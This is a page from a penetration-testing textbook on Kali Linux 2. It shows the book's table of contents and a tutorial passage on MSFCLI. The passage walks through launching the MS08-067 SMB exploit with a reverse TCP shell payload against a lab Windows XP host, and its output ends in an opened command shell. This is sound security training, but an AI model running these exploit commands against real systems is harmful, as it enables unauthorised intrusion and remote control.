Table of Contents for
Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition
Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition
Published by
Packt Publishing, 2016
- Cover
- Table of Contents
- Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
- Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
- Credits
- Disclaimer
- About the Authors
- About the Reviewer
- www.PacktPub.com
- Preface
- What you need for this book
- Who this book is for
- Conventions
- Reader feedback
- Customer support
- 1. Beginning with Kali Linux
- Kali Linux tool categories
- Downloading Kali Linux
- Using Kali Linux
- Configuring the virtual machine
- Updating Kali Linux
- Network services in Kali Linux
- Installing a vulnerable server
- Installing additional weapons
- Summary
- 2. Penetration Testing Methodology
- Vulnerability assessment versus penetration testing
- Security testing methodologies
- General penetration testing framework
- Information gathering
- The ethics
- Summary
- 3. Target Scoping
- Preparing the test plan
- Profiling test boundaries
- Defining business objectives
- Project management and scheduling
- Summary
- 4. Information Gathering
- Using public resources
- Querying the domain registration information
- Analyzing the DNS records
- Getting network routing information
- Utilizing the search engine
- Metagoofil
- Accessing leaked information
- Summary
- 5. Target Discovery
- Identifying the target machine
- OS fingerprinting
- Summary
- 6. Enumerating Target
- Understanding the TCP/IP protocol
- Understanding the TCP and UDP message format
- The network scanner
- Unicornscan
- Zenmap
- Amap
- SMB enumeration
- SNMP enumeration
- VPN enumeration
- Summary
- 7. Vulnerability Mapping
- Vulnerability taxonomy
- Automated vulnerability scanning
- Network vulnerability scanning
- Web application analysis
- Fuzz analysis
- Database assessment tools
- Summary
- 8. Social Engineering
- Attack process
- Attack methods
- Social Engineering Toolkit
- Summary
- 9. Target Exploitation
- Vulnerability and exploit repositories
- Advanced exploitation toolkit
- MSFConsole
- MSFCLI
- Ninja 101 drills
- Writing exploit modules
- Summary
- 10. Privilege Escalation
- Password attack tools
- Network spoofing tools
- Network sniffers
- Summary
- 11. Maintaining Access
- Working with tunneling tools
- Creating web backdoors
- Summary
- 12. Wireless Penetration Testing
- Wireless network recon
- Wireless testing tools
- Post cracking
- Sniffing wireless traffic
- Summary
- 13. Kali Nethunter
- Installing Kali Nethunter
- Nethunter icons
- Nethunter tools
- Third-party applications
- Wireless attacks
- HID attacks
- Summary
- 14. Documentation and Reporting
- Types of reports
- The executive report
- The management report
- The technical report
- Network penetration testing report (sample contents)
- Preparing your presentation
- Post-testing procedures
- Summary
- A. Supplementary Tools
- Web application tools
- Network tool
- Summary
- B. Key Resources
- Paid incentive programs
- Reverse engineering resources
- Penetration testing learning resources
- Exploit development learning resources
- Penetration testing on a vulnerable environment
- Online web application challenges
- Virtual machines and ISO images
- Network ports
- Index
As with the MSFConsole interface, a command-line interface (CLI) provides extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of the MSFConsole.
To access msfcli, use the terminal to execute the following command:
# msfcli -h
This will display all the available modes similar to that of the MSFConsole, as well as usage instructions for selecting the particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows:
# msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter:
# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P [*] Please wait while we load the module tree... Compatible payloads =================== Name Description ---- ----------- generic/debug_trap Generate a debug trap in the target process generic/shell_bind_tcp Listen for a connection and spawn a command shell ...
Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows:
# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on 192.168.0.3:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
As you can see, we have acquired local shell access to our target machine after setting the LHOST parameter for a chosen payload.